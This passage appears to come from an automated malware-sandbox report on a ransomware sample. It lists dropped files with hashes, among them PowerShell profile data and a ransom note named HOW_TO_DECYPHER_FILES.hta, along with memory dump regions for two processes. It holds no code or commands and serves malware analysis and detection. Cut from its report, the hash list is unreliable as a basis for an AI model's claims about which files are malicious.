                                                                                                                                                            e4a952ccba1ca281d3a4acd6a3acc5ffd2ac54224b7ebc61821f90ceda5162f8

                                                                                                                                                            SHA512

                                                                                                                                                            cb43900121c6782ce2630a2e66dbffcf163eb90b0b00d9511c48da5cb26378721715b2e03a1af81a25375884dcda69a6a4fbadb4c87d832ab3e1b4c220815cde

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            e29b94d936208a520cb0fb3d8416472e

                                                                                                                                                            SHA1

                                                                                                                                                            3dc82c632788a771c1d2a520a179cdf779ff7e27

                                                                                                                                                            SHA256

                                                                                                                                                            d64c0c03b4fe3c669d3aff0b47e8ffd7780ce8e0177bc33b55f44492b2101485

                                                                                                                                                            SHA512

                                                                                                                                                            80506f018d9b597a9e1d910a4b4611e553b3baeffd13ec27d43676ff29447389746fe9e8fc555e3c4e7440b147e007f44bb4a5b52f539c2a47769bcfdbe38747

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            db4c7bfaca013a651b74c51f006c742d

                                                                                                                                                            SHA1

                                                                                                                                                            e3d1cda996070847bf7c82f8e134a5905cdf32f0

                                                                                                                                                            SHA256

                                                                                                                                                            f08d653ea4ba9aa22c755b0cdf66ea4dd421d57e299420f614d4d3204142ac4b

                                                                                                                                                            SHA512

                                                                                                                                                            f0a5a305780467f719e8a099a04584f5a73a984a12c8460d6def58a81bbbbf14d675a3c1b6f859311ac43541e2009bb24f70448998bf2f632582624afc5d0682

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            e7edae2248bda3095713edf43347f8f7

                                                                                                                                                            SHA1

                                                                                                                                                            5d9209592eb64b8b1278e05f2f6511ca47a6e234

                                                                                                                                                            SHA256

                                                                                                                                                            a004fab11b7666e29b6810b364b42ae7c07f724a06a0bd095583824fe4954b85

                                                                                                                                                            SHA512

                                                                                                                                                            c515c041c6b4a3400be3525a8999698f9d714dfcfecc0ef744e6444333a0932329d96f23c03bb33fa55f6fca63fd8c24b42d1bf495cb7014591e5ade2b5ea864

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            9eac0517839e03358452ed4a788d0767

                                                                                                                                                            SHA1

                                                                                                                                                            d530f2f6d29d9396cdbb43f15d60959c457affd2

                                                                                                                                                            SHA256

                                                                                                                                                            d5d4be0448b7368cb4469fa9f72cd8a26f2624d44638c38f49f82e248dc0d140

                                                                                                                                                            SHA512

                                                                                                                                                            f7953604c58a27be8a1fb18b18a14ba1549779b028f3b5f373443ebcf386fbdfb4194c6b43445180d0a88c10d05840e41af9210c452e50b8bba5bb4cc394cf86

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            340b321ca8fc0c2fbf19001a75d3a764

                                                                                                                                                            SHA1

                                                                                                                                                            3d0788b2fe20beb2d01729e88597e055ac943c41

                                                                                                                                                            SHA256

                                                                                                                                                            28aea35709c42e4ca39b39e02fc299399dc597a29c8825107434302f92d9a5eb

                                                                                                                                                            SHA512

                                                                                                                                                            43421fb3d71092b75cb00b992b68535a54ccbba19e16e1c6ec5efa5e9f6df1d629127906b612eac3b351fb1b1bcc5bab800354f53638959b539754d5a6542dd1

                                                                                                                                                          • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_y1dsm4nf.vmu.ps1

                                                                                                                                                            Filesize

                                                                                                                                                            1B

                                                                                                                                                            MD5

                                                                                                                                                            c4ca4238a0b923820dcc509a6f75849b

                                                                                                                                                            SHA1

                                                                                                                                                            356a192b7913b04c54574d18c28d46e6395428ab

                                                                                                                                                            SHA256

                                                                                                                                                            6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

                                                                                                                                                            SHA512

                                                                                                                                                            4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

                                                                                                                                                          • C:\Users\Admin\Desktop\HOW_TO_DECYPHER_FILES.hta

                                                                                                                                                            Filesize

                                                                                                                                                            1KB

                                                                                                                                                            MD5

                                                                                                                                                            f063154597a6b077edd10a1330f76486

                                                                                                                                                            SHA1

                                                                                                                                                            fd541b478df1e4f0a03c42e15a5a80003ebed773

                                                                                                                                                            SHA256

                                                                                                                                                            306ad3242a7a0efc587c1c7a87eec4f575b7b25a497ea854b5278749ce5af30a

                                                                                                                                                            SHA512

                                                                                                                                                            e65a236dc57df6d3e0afbbce1e6f84daa0bd0781391e5b8aef71341737d776b257b03046d8db2d7df9b4a6517e7d096a7892795473856a528bbcf4a5540f9469

                                                                                                                                                          • memory/1988-14-0x000001EEF1530000-0x000001EEF15A6000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            472KB

                                                                                                                                                          • memory/1988-52-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/1988-48-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/1988-12-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/1988-9-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/1988-8-0x000001EED8DA0000-0x000001EED8DC2000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            136KB

                                                                                                                                                          • memory/1988-7-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4816-303-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4816-0-0x00007FF93A5B3000-0x00007FF93A5B4000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            4KB

                                                                                                                                                          • memory/4816-5-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4816-1-0x0000000000CB0000-0x0000000000CCA000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            104KB

                                                                                                                                                          • memory/4816-312-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB

                                                                                                                                                          • memory/4816-661-0x00007FF93A5B0000-0x00007FF93AF9C000-memory.dmp

                                                                                                                                                            Filesize

                                                                                                                                                            9.9MB